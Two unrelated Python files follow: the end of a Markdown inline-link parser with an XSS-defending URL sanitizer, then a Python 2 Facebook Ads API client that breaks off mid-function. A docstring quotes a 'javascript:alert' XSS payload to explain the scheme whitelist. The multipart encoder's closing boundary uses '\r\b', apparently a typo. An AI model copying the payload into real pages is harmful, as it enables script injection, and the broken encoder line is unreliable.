el2 = util.etree.SubElement(el1, tag2)
el2.text = m.group(3)
if len(m.groups()) == 5:
el2.tail = m.group(4)
return el1
class HtmlPattern(Pattern):
""" Store raw inline html and return a placeholder. """
def handleMatch(self, m):
rawhtml = self.unescape(m.group(2))
place_holder = self.markdown.htmlStash.store(rawhtml)
return place_holder
def unescape(self, text):
""" Return unescaped text given text with an inline placeholder. """
try:
stash = self.markdown.treeprocessors['inline'].stashed_nodes
except KeyError: # pragma: no cover
return text
def get_stash(m):
id = m.group(1)
value = stash.get(id)
if value is not None:
try:
return self.markdown.serializer(value)
except:
return '\%s' % value
return util.INLINE_PLACEHOLDER_RE.sub(get_stash, text)
class LinkPattern(Pattern):
""" Return a link element from the given match. """
def handleMatch(self, m):
el = util.etree.Element("a")
el.text = m.group(2)
title = m.group(13)
href = m.group(9)
if href:
if href[0] == "<":
href = href[1:-1]
el.set("href", self.sanitize_url(self.unescape(href.strip())))
else:
el.set("href", "")
if title:
title = dequote(self.unescape(title))
el.set("title", title)
return el
def sanitize_url(self, url):
"""
Sanitize a url against xss attacks in "safe_mode".
Rather than specifically blacklisting `javascript:alert("XSS")` and all
its aliases (see <http://ha.ckers.org/xss.html>), we whitelist known
safe url formats. Most urls contain a network location, however some
are known not to (i.e.: mailto links). Script urls do not contain a
location. Additionally, for `javascript:...`, the scheme would be
"javascript" but some aliases will appear to `urlparse()` to have no
scheme. On top of that relative links (i.e.: "foo/bar.html") have no
scheme. Therefore we must check "path", "parameters", "query" and
"fragment" for any literal colons. We don't check "scheme" for colons
because it *should* never have any and "netloc" must allow the form:
`username:password@host:port`.
"""
if not self.markdown.safeMode:
# Return immediately bipassing parsing.
return url
try:
scheme, netloc, path, params, query, fragment = url = urlparse(url)
except ValueError: # pragma: no cover
# Bad url - so bad it couldn't be parsed.
return ''
locless_schemes = ['', 'mailto', 'news']
allowed_schemes = locless_schemes + ['http', 'https', 'ftp', 'ftps']
if scheme not in allowed_schemes:
# Not a known (allowed) scheme. Not safe.
return ''
if netloc == '' and scheme not in locless_schemes: # pragma: no cover
# This should not happen. Treat as suspect.
return ''
for part in url[2:]:
if ":" in part:
# A colon in "path", "parameters", "query"
# or "fragment" is suspect.
return ''
# Url passes all tests. Return url as-is.
return urlunparse(url)
class ImagePattern(LinkPattern):
""" Return a img element from the given match. """
def handleMatch(self, m):
el = util.etree.Element("img")
src_parts = m.group(9).split()
if src_parts:
src = src_parts[0]
if src[0] == "<" and src[-1] == ">":
src = src[1:-1]
el.set('src', self.sanitize_url(self.unescape(src)))
else:
el.set('src', "")
if len(src_parts) > 1:
el.set('title', dequote(self.unescape(" ".join(src_parts[1:]))))
if self.markdown.enable_attributes:
truealt = handleAttributes(m.group(2), el)
else:
truealt = m.group(2)
el.set('alt', self.unescape(truealt))
return el
class ReferencePattern(LinkPattern):
""" Match to a stored reference and return link element. """
NEWLINE_CLEANUP_RE = re.compile(r'[ ]?\n', re.MULTILINE)
def handleMatch(self, m):
try:
id = m.group(9).lower()
except IndexError:
id = None
if not id:
# if we got something like "[Google][]" or "[Goggle]"
# we'll use "google" as the id
id = m.group(2).lower()
# Clean up linebreaks in id
id = self.NEWLINE_CLEANUP_RE.sub(' ', id)
if id not in self.markdown.references: # ignore undefined refs
return None
href, title = self.markdown.references[id]
text = m.group(2)
return self.makeTag(href, title, text)
def makeTag(self, href, title, text):
el = util.etree.Element('a')
el.set('href', self.sanitize_url(href))
if title:
el.set('title', title)
el.text = text
return el
class ImageReferencePattern(ReferencePattern):
""" Match to a stored reference and return img element. """
def makeTag(self, href, title, text):
el = util.etree.Element("img")
el.set("src", self.sanitize_url(href))
if title:
el.set("title", title)
if self.markdown.enable_attributes:
text = handleAttributes(text, el)
el.set("alt", self.unescape(text))
return el
class AutolinkPattern(Pattern):
""" Return a link Element given an autolink (`<http://example/com>`). """
def handleMatch(self, m):
el = util.etree.Element("a")
el.set('href', self.unescape(m.group(2)))
el.text = util.AtomicString(m.group(2))
return el
class AutomailPattern(Pattern):
"""
Return a mailto link Element given an automail link (`<foo@example.com>`).
"""
def handleMatch(self, m):
el = util.etree.Element('a')
email = self.unescape(m.group(2))
if email.startswith("mailto:"):
email = email[len("mailto:"):]
def codepoint2name(code):
"""Return entity definition by code, or the code if not defined."""
entity = entities.codepoint2name.get(code)
if entity:
return "%s%s;" % (util.AMP_SUBSTITUTE, entity)
else:
return "%s#%d;" % (util.AMP_SUBSTITUTE, code)
letters = [codepoint2name(ord(letter)) for letter in email]
el.text = util.AtomicString(''.join(letters))
mailto = "mailto:" + email
mailto = "".join([util.AMP_SUBSTITUTE + '#%d;' %
ord(letter) for letter in mailto])
el.set('href', mailto)
return el
|
|
import codecs
import calendar
import datetime
import io
import json
import logging
import mimetypes
import sys
import urllib
import urllib2
import uuid
FACEBOOK_API = 'https://graph.facebook.com'
logger = logging.getLogger(__name__)
class MultipartFormdataEncoder(object):
def __init__(self):
self.boundary = uuid.uuid4().hex
self.content_type = 'multipart/form-data; boundary={}'.format(
self.boundary)
@classmethod
def u(cls, s):
if sys.hexversion < 0x03000000 and isinstance(s, str):
s = s.decode('utf-8')
if sys.hexversion >= 0x03000000 and isinstance(s, bytes):
s = s.decode('utf-8')
return s
def iter(self, fields, files):
"""
fields is a sequence of (name, value) elements for regular form fields.
files is a sequence of (name, file-like) elements for data
to be uploaded as files.
Yield body's chunk as bytes
"""
encoder = codecs.getencoder('utf-8')
for key, value in fields.iteritems():
key = self.u(key)
yield encoder('--{}\r\n'.format(self.boundary))
yield encoder(self.u(
'Content-Disposition: form-data; name="{}"\r\n').format(key))
yield encoder('\r\n')
if isinstance(value, int) or isinstance(value, float):
value = str(value)
yield encoder(self.u(value))
yield encoder('\r\n')
for key, value in files.iteritems():
key = self.u(key)
filename = self.u(value.name)
yield encoder('--{}\r\n'.format(self.boundary))
yield encoder(self.u('Content-Disposition: form-data; name="{}"; filename="{}"\r\n').format(key, filename))
yield encoder('Content-Type: {}\r\n'.format(mimetypes.guess_type(filename)[0] or 'application/octet-stream'))
yield encoder('\r\n')
buff = value.read()
yield (buff, len(buff))
yield encoder('\r\n')
yield encoder('--{}--\r\b'.format(self.boundary))
def encode(self, fields, files):
body = io.BytesIO()
for chunk, chunk_len in self.iter(fields, files):
body.write(chunk)
return self.content_type, body.getvalue()
class AdsAPIError(Exception):
"""
Errors as defined in the Facebook documentation
https://developers.facebook.com/docs/reference/ads-api/error-reference/
"""
def __init__(self, error):
try:
self.error = json.load(error)
except:
self.message = '{}'.format(error)
self.code = None
self.type = None
self.str = self.message
self.error = {'message': self.message}
else:
error_dict = self.error.get('error', {})
self.message = error_dict.get('message', '')
# New error details in api 2.2
if 'error_user_title' in error_dict:
self.message += ' - ' + error_dict['error_user_title']
if 'error_user_msg' in error_dict:
self.message += ' - ' + error_dict['error_user_msg']
self.code = self.error.get('error', {}).get('code')
self.type = self.error.get('error', {}).get('type')
self.str = '(%s %s) %s' % (self.type, self.code, self.message)
def __str__(self):
return self.str
class AdsAPI(object):
"""A client for the Facebook Ads API."""
DATA_LIMIT = 1000
def __init__(self, access_token, app_id='', app_secret='', version=None):
"""
:param access_token: The API access token
:param app_id: An optional App id, current only used for debug_token.
:param app_secret: An optional App secret, currently only used for debug_token
:param version: Facebook API version, e.g. "2.2". It's currently optional but will be required soon.
"""
self.access_token = access_token
self.app_id = app_id
self.app_secret = app_secret
if version:
self.api_root = '{}/v{}'.format(FACEBOOK_API, version)
else:
self.api_root = FACEBOOK_API
def make_request(self, path, method, args=None, files=None, batch=False, raw_path=False):
"""Makes a request against the Facebook Ads API endpoint."""
args = dict(args or {})
args = {k.encode('utf-8'): unicode(v).encode('utf-8')
for k, v in args.items()}
if batch:
# Then just return a dict for the batch request
return {
'method': method,
'relative_url': '%s?%s' % (path, urllib.urlencode(args))
}
logger.info('Making a %s request at %s/%s with %s' % (method, self.api_root, path, args))
if 'access_token' not in args:
args['access_token'] = self.access_token
try:
if method == 'GET':
url = path if raw_path else '%s/%s?%s' % (self.api_root, path, urllib.urlencode(args))
f = urllib2.urlopen(url)
elif method == 'POST':
url = path if raw_path else '%s/%s' % (self.api_root, path)
if files:
encoder = MultipartFormdataEncoder()
content_type, body = encoder.encode(args, files)
req = urllib2.Request(url, data=body)
req.add_header('Content-Type', content_type)
f = urllib2.urlopen(req)
else:
f = urllib2.urlopen(url, urllib.urlencode(args))
elif method == 'DELETE':
url = path if raw_path else '%s/%s?%s' % (self.api_root, path, urllib.urlencode(args))
req = urllib2.Request(url)
req.get_method = lambda: 'DELETE'
f = urllib2.urlopen(req)
else:
raise
return json.load(f)
except urllib2.HTTPError as e:
err = AdsAPIError(e)
# Info, not warning or error, because these often happen as an expected result because of user input
# and well formed requests that facebook rejects.
logger.info(u'API Error: {}'.format(err.message))
raise err
except urllib2.URLError as e:
logger.warn(u'URLError: %s' % e.reason)
raise
def make_batch_request(self, batch):
"""Makes a batched request against the Facebook Ads API endpoint."""
args = {}
args['access_token'] = self.access_token
args['batch'] = json.dumps(batch)
args = {k.encode('utf-8'): unicode(v).encode('utf-8')
for k, v in args.items()}
logger.info('Making a batched request with %s' % args)
try:
f = urllib2.urlopen(self.api_root, urllib.urlencode(args))
data = json.load(f)
# For debugging
self.data = data
for idx, val in enumerate(data):
data[idx] = json.loads(val['body'])
return data
except urllib2.HTTPError as e:
logger.info('%s' % e)
return json.load(e)
except urllib2.URLError as e:
logger.warn('URLError: %s' % e.reason)
# New API
def make_labeled_batch_request(self, batch):
"""Makes a batched request with label against the Facebook Ads API."""
try:
labels = batch.keys()
queries = batch.values()
data = self.make_batch_request(queries)
# For debugging
self.data = data
return dict(zip(labels, data))
except urllib2.HTTPError as e:
print '%s' % e
return json.load(e)
except urllib2.URLError as e:
print 'URLError: %s' % e.reason
def debug_token(self, token):
"""Returns debug information about the given token."""
path = 'debug_token'
args = {
'input_token': token,
'access_token': '%s|%s' % (self.app_id, self.app_secret)
}
return self.make_request(path, 'GET', args)
def get_adusers(self, account_id, batch=False):
"""Returns the users of the given ad account."""
path = 'act_%s/users' % account_id
return self.make_request(path, 'GET', batch=batch)
def get_adaccount(self, account_id, fields=None, batch=False):
"""Returns the fields of the given ad account."""
path = 'act_%s' % account_id
args = {'fields': fields} if fields else {}
return self.make_request(path, 'GET', args, batch=batch)
def get_adaccounts(self, user_id, fields,
paging_cursors={}, batch=False):
"""Returns the list of Facebook ad accounts."""
path = '%s/adaccounts' % user_id
args = {'fields': fields}
if paging_cursors:
args.update(paging_cursors)
return self.make_request(path, 'GET', args, batch=batch)
# New API
def get_adcampaign_group(self, campaign_group_id, fields, batch=False):
"""Return the fields for the given ad campaign group."""
path = '%s' % campaign_group_id
args = {'fields': fields}
return self.make_request(path, 'GET', args, batch=batch)
# New API
def get_adcampaign_groups(self, account_id, fields, batch=False):
"""Returns the fields of all ad campaign groups
from the given ad account."""
path = 'act_%s/adcampaign_groups' % account_id
args = {
'fields': fields,
'limit': self.DATA_LIMIT
}
return self.make_request(path, 'GET', args, batch=batch)
# New API
def delete_adcampaign_group(self, campaign_group_id, batch=False):
"""Delete specific campaign group."""
path = '%s' % campaign_group_id
return self.make_request(path, 'DELETE', batch=batch)
def get_adcampaign(self, campaign_id, fields, batch=False):
"""Returns the fields for the given ad campaign."""
path = '%s' % campaign_id
args = {'fields': fields}
return self.make_request(path, 'GET', args, batch=batch)
# New API
def get_adcampaigns_of_campaign_group(self, campaign_group_id, fields,
batch=False):
"""Return the fields of all adcampaigns
from the given adcampaign group."""
path = '%s/adcampaigns' % campaign_group_id
args = {'fields': fields}
return self.make_request(path, 'GET', args, batch=batch)
# New API
def get_adcampaigns_of_account(self, account_id, fields, batch=False):
"""Returns the fields of all ad sets from the given ad account."""
path = 'act_%s/adcampaigns' % account_id
args = {
'fields': fields,
'limit': self.DATA_LIMIT
}
return self.make_request(path, 'GET', args, batch=batch)
def get_adcampaigns(self, account_id, fields=None, batch=False):
"""Returns the fields of all ad sets from the given ad account."""
return self.get_adcampaigns_of_account(account_id, fields, batch=batch)
def get_adgroup(self, adgroup_id, fields=None, batch=False):
"""Returns the fields for the given ad group."""
path = '%s' % adgroup_id
args = {'fields': fields} if fields else {}
return self.make_request(path, 'GET', args, batch=batch)
def get_adgroups_by_adaccount(self, account_id, fields=None,
status_fields=None, batch=False):
"""Returns the fields of all ad groups from the given ad account."""
path = 'act_%s/adgroups' % account_id
args = {'fields': fields} if fields else {}
if status_fields:
args['adgroup_status'] = status_fields
return self.make_request(path, 'GET', args, batch=batch)
def get_adgroups_by_adcampaign(self, campaign_id, fields=None,
status_fields=None, batch=False):
"""Returns the fields of all ad groups from the given ad campaign."""
path = '%s/adgroups' % campaign_id
args = {'fields': fields} if fields else {}
if status_fields:
args['adgroup_status'] = status_fields
return self.make_request(path, 'GET', args, batch=batch)
def get_adcreative(self, creative_id, fields, batch=False):
"""Returns the fields for the given ad creative."""
path = '%s' % creative_id
args = {'fields': fields}
return self.make_request(path, 'GET', args, batch=batch)
def get_adcreatives(self, account_id, fields, batch=False):
"""Returns the fields for the given ad creative."""
path = 'act_%s/adcreatives' % account_id
args = {'fields': fields}
return self.make_request(path, 'GET', args, batch=batch)
def get_adcreatives_by_adgroup(self, adgroup_id, fields, batch=False):
"""Returns the fields for the given ad creative."""
path = '{0}/adcreatives'.format(adgroup_id)
args = {'fields': fields}
return self.make_request(path, 'GET', args, batch=batch)
def get_adimages(self, account_id, hashes=None, batch=False):
"""Returns the ad images for the given ad account."""
path = 'act_%s/adimages' % account_id
args = {}
if hashes is not None:
args = {'hashes': hashes}
return self.make_request(path, 'GET', args, batch=batch)
# New API
def get_stats_by_adcampaign_group(
self, campaign_group_id, fields=None, filters=None, batch=False,
start_time=None, end_time=None):
"""Returns the stats for a Facebook campaign group."""
args = {}
if fields:
args['fields'] = json.dumps(fields)
if filters:
args['filters'] = json.dumps(filters)
if start_time:
args['start_time'] = self.__parse_time(start_time)
if end_time:
args['end_time'] = self.__parse_time(end_time)
path = '%s/stats' % campaign_group_id
return self.make_request(path, 'GET', args, batch=batch)
def get_stats_by_adaccount(self, account_id, batch=False, start_time=None, end_time=None):
"""Returns the stats for a Facebook campaign group."""
args = {}
start_time = start_time or 0
path = 'act_{0}/stats/{1}'.format(account_id, self.__parse_time(start_time))
if end_time:
path = path + '/{0}'.format(self.__parse_time(end_time))
return iterate_by_page(self.make_request(path, 'GET', args, batch=batch))
def get_stats_by_adcampaign(self, account_id, campaign_ids=None,
batch=False, start_time=None, end_time=None):
"""Returns the stats for a Facebook campaign by adcampaign."""
args = {}
if campaign_ids is not None:
args['campaign_ids'] = json.dumps(campaign_ids)
if start_time:
args['start_time'] = self.__parse_time(start_time)
if end_time:
args['end_time'] = self.__parse_time(end_time)
path = 'act_%s/adcampaignstats' % account_id
return self.make_request(path, 'GET', args, batch=batch)
def get_stats_by_adgroup(
self, account_id, adgroup_ids=None, batch=False,
start_time=None, end_time=None):
"""Returns the stats for a Facebook campaign by adgroup."""
args = {}
if adgroup_ids is not None:
args['adgroup_ids'] = json.dumps(adgroup_ids)
if start_time:
args['start_time'] = self.__parse_time(start_time)
if end_time:
args['end_time'] = self.__parse_time(end_time)
path = 'act_%s/adgroupstats' % account_id
return self.make_request(path, 'GET', args, batch=batch)
# New API
def get_time_interval(self, start, end):
"""Returns formatted time interval."""
if not start or not end:
return None
end = end + datetime.timedelta(1)
if not isinstance(start, datetime.datetime):
start = datetime.datetime(start)
if not isinstance(end, datetime.datetime):
end = datetime.datetime(end)
time_interval = dict(
day_start=dict(day=start.day, month=start.month, year=start.year),
day_stop=dict(day=end.day, month=end.month, year=end.year)
)
return json.dumps(time_interval)
def get_adreport_stats(self, account_id, date_preset, time_increment,
data_columns, filters=None, actions_group_by=None,
batch=False):
"""Returns the ad report stats for the given account."""
path = 'act_%s/reportstats' % account_id
args = {
'date_preset': date_preset,
'time_increment': time_increment,
'data_columns': json.dumps(data_columns),
}
if filters is not None:
args['filters'] = json.dumps(filters)
if actions_group_by is not None:
args['actions_group_by'] = actions_group_by
return self.make_request(path, 'GET', args, batch=batch)
# New API
def get_adreport_stats2(self, account_id, data_columns, date_preset=None,
date_start=None, date_end=None,
time_increment=None, actions_group_by=None,
filters=None, async=False, batch=False, offset=None,
sort_by=None, sort_dir=None, summary=None,
limit=None):
"""Returns the ad report stats for the given account."""
if date_preset is None and date_start is None and date_end is None:
raise AdsAPIError("Either a date_preset or a date_start/end \
must be set when requesting a stats info.")
path = 'act_%s/reportstats' % account_id
args = {
'data_columns': json.dumps(data_columns),
}
if date_preset:
args['date_preset'] = date_preset
if offset:
args['offset'] = offset
if date_start and date_end:
args['time_interval'] = \
self.get_time_interval(date_start, date_end)
if time_increment:
args['time_increment'] = time_increment
if filters:
args['filters'] = json.dumps(filters)
if actions_group_by:
args['actions_group_by'] = json.dumps(actions_group_by)
if sort_by:
args['sort_by'] = sort_by
if sort_dir:
args['sort_dir'] = sort_dir
if summary is not None:
args['summary'] = summary
if limit:
args['limit'] = limit
if async:
args['async'] = 'true'
return self.make_request(path, 'POST', args=args, batch=batch)
return self.make_request(path, 'GET', args=args, batch=batch)
# New API
def get_async_job_status(self, job_id, batch=False):
"""Returns the asynchronously requested job status"""
path = '%s' % job_id
return self.make_request(path, 'GET', batch=batch)
# New API
def get_async_job_result(self, account_id, job_id, batch=False):
"""Returns completed result of the given async job"""
path = 'act_%s/reportstats' % account_id
args = {
'report_run_id': job_id
}
return self.make_request(path, 'GET', args=args, batch=batch)
def get_conversion_stats_by_adaccount(self, account_id, batch=False):
"""Returns the aggregated conversion stats for the given ad account."""
path = 'act_%s/conversions' % account_id
return self.make_request(path, 'GET', batch=batch)
def get_conversion_stats_by_adcampaign(
self, account_id, campaign_ids=None, include_deleted=False,
start_time=None, end_time=None, aggregate_days=None,
by_impression_time=True, batch=False):
"""Returns the conversions stats for all ad campaigns."""
path = 'act_%s/adcampaignconversions' % account_id
args = {}
if campaign_ids is not None:
args['campaign_ids'] = json.dumps(campaign_ids)
if include_deleted is not None:
args['include_deleted'] = include_deleted
if start_time is not None:
args['start_time'] = start_time
if end_time is not None:
args['end_time'] = end_time
if aggregate_days is not None:
args['aggregate_days'] = aggregate_days
if not by_impression_time:
args['by_impression_time'] = 'false'
return self.make_request(path, 'GET', args, batch=batch)
def get_conversion_stats_by_adgroup(self, account_id, adgroup_ids=None,
include_deleted=False, batch=False):
"""Returns the conversions stats for all ad groups."""
path = 'act_%s/adgroupconversions' % account_id
args = {}
if adgroup_ids is not None:
args['adgroup_ids'] = json.dumps(adgroup_ids)
if include_deleted is not None:
args['include_deleted'] = include_deleted
return self.make_request(path, 'GET', args, batch=batch)
def get_conversion_stats(self, adgroup_id, batch=False):
"""Returns the conversion stats for a single ad group."""
path = '%s/conversions' % adgroup_id
return self.make_request(path, 'GET', batch=batch)
def get_custom_audiences(self, account_id, fields=None, batch=False):
"""Returns the information for a given audience."""
path = 'act_%s/customaudiences' % account_id
args = { 'limit': self.DATA_LIMIT }
if fields: args['fields'] = fields
return self.make_request(path, 'GET', args, batch=batch)
def get_ads_pixels(self, account_id, fields=None, batch=False):
"""Returns the remarketing pixel."""
path = 'act_%s/adspixels' % account_id
args = {'fields': fields} if fields else {}
return self.make_request(path, 'GET', args, batch=batch)
# Deprecated: remove at Oct 1st 2014, breaking change on Facebook.
def get_remarketing_pixel(self, account_id, batch=False):
"""Returns the remarketing pixel."""
logger.warn("This method is deprecated and is replaced with get_ads_pixels.")
path = 'act_%s/remarketingpixelcode' % account_id
return self.make_request(path, 'GET', batch=batch)
def get_offsite_pixel(self, offsite_pixel_id, batch=False):
"""Returns the information for the given offsite pixel."""
path = '%s' % offsite_pixel_id
return self.make_request(path, 'GET', batch=batch)
def get_offsite_pixels(self, account_id, batch=False):
"""Returns the list of offsite pixels for the given account."""
path = 'act_%s/offsitepixels' % account_id
return self.make_request(path, 'GET', batch=batch)
def get_keyword_stats(self, adgroup_id, batch=False):
"""Returns the keyword stats for the given ad group."""
path = '%s/keywordstats' % adgroup_id
return self.make_request(path, 'GET', batch=batch)
def get_ratecard(self, account_id, batch=False):
"""Returns the rate card for Homepage Ads."""
path = 'act_%s/ratecard' % account_id
return self.make_request(path, 'GET', batch=batch)
def get_reach_estimate(self, account_id, targeting_spec, currency=None,
creative_action_spec=None,
bid_for=None, batch=False):
"""Returns the reach estimate for the given currency and targeting."""
path = 'act_%s/reachestimate' % account_id
args = {
'targeting_spec': json.dumps(targeting_spec),
}
if currency is not None:
args['currency'] = json.dumps(currency)
if creative_action_spec is not None:
args['creative_action_spec'] = json.dumps(creative_action_spec)
if bid_for is not None:
args['bid_for'] = bid_for
return self.make_request(path, 'GET', args, batch=batch)
def get_targeting_sentence_lines(self, account_id, targeting_spec, batch=False):
"""Returns FB's description of the targeting spec, provided as a JSON structure."""
path = 'act_%s/targetingsentencelines' % account_id
args = {'targeting_spec': json.dumps(targeting_spec)}
return self.make_request(path, 'GET', args, batch=batch)
def get_adcampaign_list(self, account_id):
"""Returns the list of ad campaigns and related data."""
fields = 'id, name, campaign_status, start_time, end_time, ' \
'daily_budget, lifetime_budget, budget_remaining'
batch = [
self.get_adaccount(account_id, ['currency'], batch=True),
self.get_adcampaigns(account_id, fields, batch=True),
self.get_stats_by_adcampaign(account_id, batch=True),
]
return self.make_batch_request(batch)
def get_adcampaign_detail(self, account_id, campaign_id, date_preset):
"""Returns the detail of an ad campaign."""
campaign_fields = [
'name', 'campaign_status', 'daily_budget', 'lifetime_budget',
'start_time', 'end_time']
campaign_data_columns = [
'campaign_name', 'reach', 'frequency', 'clicks',
'actions', 'total_actions', 'ctr', 'spend']
adgroup_data_columns = [
'campaign_id', 'campaign_name', 'adgroup_id', 'adgroup_name',
'reach', 'frequency', 'clicks', 'ctr', 'actions', 'cpm', 'cpc',
'spend']
demographic_data_columns = [
'campaign_id', 'reach', 'frequency', 'clicks', 'actions', 'spend',
'cpc', 'cpm', 'ctr', 'cost_per_total_action', 'age', 'gender']
placement_data_columns = [
'campaign_id', 'reach', 'frequency', 'clicks', 'actions', 'spend',
'cpc', 'cpm', 'ctr', 'cost_per_total_action', 'placement']
campaign_filters = [{
'field': 'campaign_id', 'type': 'in', 'value': [campaign_id]}]
batch = [
self.get_adaccount(account_id, ['currency'], batch=True),
self.get_adcampaign(campaign_id, campaign_fields, batch=True),
self.get_adreport_stats(
account_id, date_preset, 'all_days', campaign_data_columns,
campaign_filters, ['action_type'], True),
self.get_adreport_stats(
account_id, date_preset, 1, campaign_data_columns,
campaign_filters, None, True),
self.get_adreport_stats(
account_id, date_preset, 'all_days', adgroup_data_columns,
campaign_filters, None, True),
self.get_adreport_stats(
account_id, date_preset, 'all_days', demographic_data_columns,
campaign_filters, None, True),
self.get_adreport_stats(
account_id, date_preset, 'all_days', placement_data_columns,
campaign_filters, None, True),
]
return self.make_batch_request(batch)
def get_user_pages(self, user_id, fields=None, batch=False):
"""Returns the list of pages to which user has access with tokens."""
path = '%s/accounts' % user_id
args = {}
if fields:
args['fields'] = json.dumps(fields)
return self.make_request(path, 'GET', args, batch=batch)
# This appears to be deprecated.
def get_autocomplete_data(self, q, type, want_localized_name=False,
list=None, limit=None, batch=False):
"""Returns the autocomplete data for the given query and type."""
path = '%s/search' % q
args = {'type': type}
if want_localized_name:
args['want_localized_name'] = want_localized_name
if list:
args['list'] = list
if limit:
args['limit'] = limit
return self.make_request(path, 'GET', args, batch=batch)
def get_search(self, type, params, batch=False):
""" Performs a generic Facebook search, e.g. for geolocations, interests """
path = 'search'
args = {'type': type}
args.update(params)
return self.make_request(path, 'GET', args, batch=batch)
def get_page_access_token(self, page_id, batch=False):
"""Returns the page access token for the given page."""
path = '%s' % page_id
args = {'fields': 'access_token'}
return self.make_request(path, 'GET', args, batch=batch)
def get_page_post(self, page_post_id, fields=None, batch=False):
"""Returns data for the give page post."""
path = '%s' % page_post_id
args = {}
if fields:
args['fields'] = json.dumps(fields)
return self.make_request(path, 'GET', args, batch=batch)
def create_adimage(self, account_id, image_data, batch=False):
"""Creates an ad image in the given ad account."""
path = 'act_%s/adimages' % account_id
files = {image_data.name: image_data}
return self.make_request(path, 'POST', None, files, batch=batch)
def create_link_page_post(self, page_id, link=None, message=None, picture=None,
thumbnail=None, name=None, caption=None,
description=None, published=None, call_to_action=None, batch=False):
"""Creates a link page post on the given page."""
page_access_token = self.get_page_access_token(page_id)
if 'error' in page_access_token:
return page_access_token
if 'access_token' not in page_access_token:
raise AdsAPIError('Could not get page access token. (Do you have manage pages permission?)')
path = '%s/feed' % page_id
args = {
'access_token': page_access_token['access_token'],
}
files = {}
if link is not None:
args['link'] = link
if message is not None:
args['message'] = message
if picture is not None:
args['picture'] = picture
if thumbnail is not None:
files['thumbnail'] = thumbnail
if published is not None:
args['published'] = published
if name is not None:
args['name'] = name
if caption is not None:
args['caption'] = caption
if description is not None:
args['description'] = description
if call_to_action is not None:
args['call_to_action'] = json.dumps(call_to_action)
return self.make_request(path, 'POST', args, files, batch=batch)
def create_video_page_post(self, page_id, source, title=None,
description=None, thumb=None, published=True,
scheduled_publish_time=None, batch=False):
# TODO: this method is calling the API twice; combine them into batch
page_access_token = self.get_page_access_token(page_id)
path = '%s/videos' % page_id
args = {
'published': published,
'access_token': page_access_token['access_token'],
}
files = {'source': source}
if title is not None:
args['title'] = title
if description is not None:
args['description'] = description
if thumb is not None:
files['thumb'] = thumb
if scheduled_publish_time is not None:
args['scheduled_publish_time'] = scheduled_publish_time
return self.make_request(path, 'POST', args, files, batch=batch)
def create_adcampaign_group(self, account_id, name, campaign_group_status,
objective=None, batch=False):
"""Creates an ad campaign group for the given account."""
path = 'act_%s/adcampaign_groups' % account_id
args = {
'name': name,
'campaign_group_status': campaign_group_status,
}
if objective is not None:
args['objective'] = objective
return self.make_request(path, 'POST', args, batch=batch)
def update_adcampaign_group(self, campaign_group_id, name=None,
campaign_group_status=None, objective=None,
batch=False):
"""Updates condition of the given ad campaign group."""
path = '%s' % campaign_group_id
args = {}
if name is not None:
args['name'] = name
if campaign_group_status is not None:
args['campaign_group_status'] = campaign_group_status
if objective is not None:
args['objective'] = objective
return self.make_request(path, 'POST', args, batch=batch)
def create_adset(self, account_id, campaign_group_id, name,
campaign_status, daily_budget=None, lifetime_budget=None,
start_time=None, end_time=None,
bid_type=None, bid_info=None, promoted_object=None, targeting=None, batch=False):
"""
Creates an adset (formerly called ad campaign) for the given account and the campaign (formerly called "campaign group").
"""
if daily_budget is None and lifetime_budget is None:
raise AdsAPIError("Either a lifetime_budget or a daily_budget \
must be set when creating a campaign")
if lifetime_budget is not None and end_time is None:
raise AdsAPIError("end_time is required when lifetime_budget \
is specified")
path = 'act_%s/adcampaigns' % account_id
args = {
'campaign_group_id': campaign_group_id,
'name': name,
'campaign_status': campaign_status,
}
if daily_budget:
args['daily_budget'] = daily_budget
if lifetime_budget:
args['lifetime_budget'] = lifetime_budget
if start_time:
args['start_time'] = start_time
if end_time:
args['end_time'] = end_time
if bid_type:
args['bid_type'] = bid_type
if bid_info:
args['bid_info'] = bid_info
if promoted_object:
args['promoted_object'] = json.dumps(promoted_object)
if targeting:
args['targeting'] = json.dumps(targeting)
return self.make_request(path, 'POST', args, batch=batch)
def update_adset(self, campaign_id, name=None, campaign_status=None,
daily_budget=None, lifetime_budget=None,
start_time=None, end_time=None,
bid_type=None, bid_info=None, promoted_object=None, targeting=None, batch=False):
"""Updates the given adset."""
path = '%s' % campaign_id
args = {}
if name:
args['name'] = name
if campaign_status:
args['campaign_status'] = campaign_status
if daily_budget:
args['daily_budget'] = daily_budget
if lifetime_budget:
args['lifetime_budget'] = lifetime_budget
if start_time:
args['start_time'] = start_time
if end_time is not None:
args['end_time'] = end_time
if bid_type:
args['bid_type'] = bid_type
if bid_info:
args['bid_info'] = bid_info
if promoted_object:
args['promoted_object'] = json.dumps(promoted_object)
if targeting:
args['targeting'] = json.dumps(targeting)
return self.make_request(path, 'POST', args, batch=batch)
# New API
def delete_adcampaign(self, campaign_id, batch=False):
"""Delete the given ad campaign."""
path = '%s' % campaign_id
return self.make_request(path, 'DELETE', batch=batch)
def create_adcreative(self, account_id, name=None, object_story_id=None, object_story_spec=None, batch=False):
"""Creates an ad creative in the given ad account."""
path = 'act_%s/adcreatives' % account_id
args = {}
if name:
args['name'] = name
if object_story_id:
args['object_story_id'] = object_story_id
if object_story_spec:
args['object_story_spec'] = json.dumps(object_story_spec)
return self.make_request(path, 'POST', args, batch=batch)
def create_adgroup(self, account_id, name, campaign_id,
creative_id, bid_type=None, bid_info=None, max_bid=None,
tracking_specs=None, view_tags=None, objective=None,
adgroup_status=None, targeting=None, conversion_specs=None, batch=False):
"""Creates an adgroup in the given ad camapaign with the given spec."""
path = 'act_%s/adgroups' % account_id
args = {
'name': name,
'campaign_id': campaign_id,
'creative': json.dumps({'creative_id': creative_id}),
}
if bid_type:
args['bid_type'] = bid_type
if max_bid:
# can only use max_bid with CPM bidding
args['max_bid'] = max_bid
elif bid_info:
args['bid_info'] = json.dumps(bid_info)
if tracking_specs:
args['tracking_specs'] = json.dumps(tracking_specs)
if view_tags:
args['view_tags'] = json.dumps(view_tags)
if objective:
args['objective'] = objective
if adgroup_status:
args['adgroup_status'] = adgroup_status
if targeting:
args['targeting'] = json.dumps(targeting)
if conversion_specs:
args['conversion_specs'] = json.dumps(conversion_specs)
return self.make_request(path, 'POST', args, batch=batch)
def update_adgroup(self, adgroup_id, name=None, adgroup_status=None,
bid_type=None, bid_info=None, creative_id=None,
tracking_specs=None, view_tags=None, objective=None,
targeting=None, conversion_specs=None,
batch=False):
"""Updates condition of the given ad group."""
path = "%s" % adgroup_id
args = {}
if name:
args['name'] = name
if bid_type:
args['bid_type'] = bid_type
if bid_info:
